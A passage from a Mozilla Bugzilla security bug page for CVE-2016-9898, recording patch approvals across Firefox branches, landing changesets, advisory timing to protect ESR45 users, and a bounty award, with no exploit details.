Sec-approval for checkin on 11/29, two weeks into the new cycle (not before). We'll want patches for affected branches made and nominated at that time as well.
status-firefox-esr45:
--- → affected
tracking-firefox51:
--- → +
tracking-firefox52:
--- → +
tracking-firefox-esr45:
--- → 51+
Whiteboard: [checkin on 11/29]
Comment 8•8 years ago
|
||
Comment on attachment 8807693 [details] [diff] [review]
nac_editors.diff
(Or we can use this patch since it is nominated for those but I'm not approving branches until after this lands on trunk on 11/29)
Attachment #8807693 -
Flags: sec-approval? → sec-approval+
Comment 9•8 years ago
|
||
Updated•8 years ago
|
Attachment #8807693 -
Flags: approval-mozilla-release?
Comment 10•8 years ago
|
||
Status: NEW → RESOLVED
Closed: 8 years ago
status-firefox53:
--- → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla53
Comment on attachment 8807693 [details] [diff] [review]
nac_editors.diff
Sec-high, approved for all branches
Attachment #8807693 -
Flags: approval-mozilla-release?
Attachment #8807693 -
Flags: approval-mozilla-release+
Attachment #8807693 -
Flags: approval-mozilla-esr45?
Attachment #8807693 -
Flags: approval-mozilla-esr45+
Attachment #8807693 -
Flags: approval-mozilla-beta?
Attachment #8807693 -
Flags: approval-mozilla-beta+
Attachment #8807693 -
Flags: approval-mozilla-aurora?
Attachment #8807693 -
Flags: approval-mozilla-aurora+
Comment 12•8 years ago
|
||
https://hg.mozilla.org/releases/mozilla-aurora/rev/6ae1e6a5259f
https://hg.mozilla.org/releases/mozilla-beta/rev/efaf5e3fce2c
https://hg.mozilla.org/releases/mozilla-release/rev/4ed20a0426ec
tracking-firefox53:
--- → ?
Flags: in-testsuite?
Comment 13•8 years ago
|
||
Comment 14•8 years ago
|
||
Would have helped if I'd pushed the right patch.
https://hg.mozilla.org/releases/mozilla-esr45/rev/5054047b7328
Comment 16•8 years ago
|
||
Can't write an advisory for 50.1 for this because then I'll 0day ESR45 users as it was checked into normal ESR45 branch.
Updated•8 years ago
|
Flags: needinfo?(abillings)
Comment 17•8 years ago
|
||
Ok. There is a 45.6 ESR release at the same time as 50.1. The advisory for this should be in the release.
Flags: needinfo?(abillings)
Whiteboard: [adv-main50.1+][adv-esr45.6+]
Updated•8 years ago
|
Alias: CVE-2016-9898
Updated•8 years ago
|
Group: dom-core-security → core-security-release
Updated•8 years ago
|
Updated•8 years ago
|
Group: core-security-release
Updated•8 years ago
|
Flags: sec-bounty?
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty+
Updated•6 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•